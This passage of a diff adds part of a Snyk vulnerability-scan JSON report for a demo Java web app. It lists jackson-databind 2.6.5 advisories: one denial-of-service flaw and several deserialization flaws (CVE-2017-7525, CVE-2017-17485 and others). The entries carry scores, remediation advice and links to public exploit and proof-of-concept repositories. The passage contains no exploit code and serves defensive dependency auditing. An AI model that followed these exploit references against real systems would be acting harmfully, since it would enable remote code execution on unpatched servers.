Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", + "epssDetails": { + "percentile": "0.65501", + "probability": "0.00252", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42003" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": 
"com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:41:44.046865Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:22:10Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T09:54:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.258948Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.9)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.9" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": 
"com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1599", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.167922Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization 
of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", + "epssDetails": { + "percentile": "0.97700", + "probability": "0.57112", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-7525" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qxxx-2pp7-5hmx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-09-14T14:43:48.569000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + 
"className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-04-10T21:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-09-14T14:43:48Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.385289Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": 
"https://github.com/FasterXML/jackson-databind/commit/e8f043d1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1680", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1737", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:13.013603Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for 
[CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", + "epssDetails": { + "percentile": "0.92802", + "probability": "0.04801", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-15095" + ], + "CWE": [ + "CWE-184" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-11-07T13:13:32.343000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-06-26T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + 
"level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-11-09T03:13:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:46.857906Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Imre Rad" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1855", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/irsl/jackson-rce-via-spel/", + "title": "PoC Project" + } + ], + 
"cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.686860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", + "epssDetails": { + "percentile": "0.95701", + "probability": "0.13977", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-17485" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-11T11:41:28.547000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-10T11:41:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + 
"publicationTime": "2018-01-22T12:30:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:58.597489Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Rui Chong" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1899", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + 
"modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:07.715996Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", + "epssDetails": { + "percentile": "0.94704", + "probability": "0.09270", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-5968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-w3f4-3q6j-rh82" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-22T15:40:18.105000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": 